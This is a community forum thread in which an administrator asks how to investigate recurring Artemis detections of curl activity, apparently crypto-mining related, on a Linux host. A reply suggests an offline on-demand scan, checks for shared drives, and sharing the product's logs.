Hello Community members
We have been seeing a lot of events on one of the Linux host and they all have same details are successfully handled. This is an Artimis detection. I assume curl is trying to execute some commands however, I'm not sure how to troubleshoot this scenario and get to the root cause of it. As per Virutotal Information, this appears to be crypto Mining related attempt.
Please advise how can we investigate
- What curl is trying to execute
- Where these jobs are scheduled to run and what are they
The drive from where you are seeing this detection, is it shared with other users?
Once we have deleted the file from the location, and again it is coming back that means there is some other process creating it. If not locally then remotely.
If your Artemis Level for OAS is set as Medium, then trigger an ODS (preferably offline) on that Linux box with same Artemis Level.
Once the ODS is complete, check if you are still seeing the detection from OAS.
Curl is shared library here so there is definitely some other application which is using it to trigger these events.
Suggestion of offline scanning given considering that the machine is shared with others. If that is not the case then you can directly trigger the ODS.
From the logging side we can only capture what is written within the logs. So if you can share the logs from opt/isec/ens/threatprevention/var/ location we can check more details.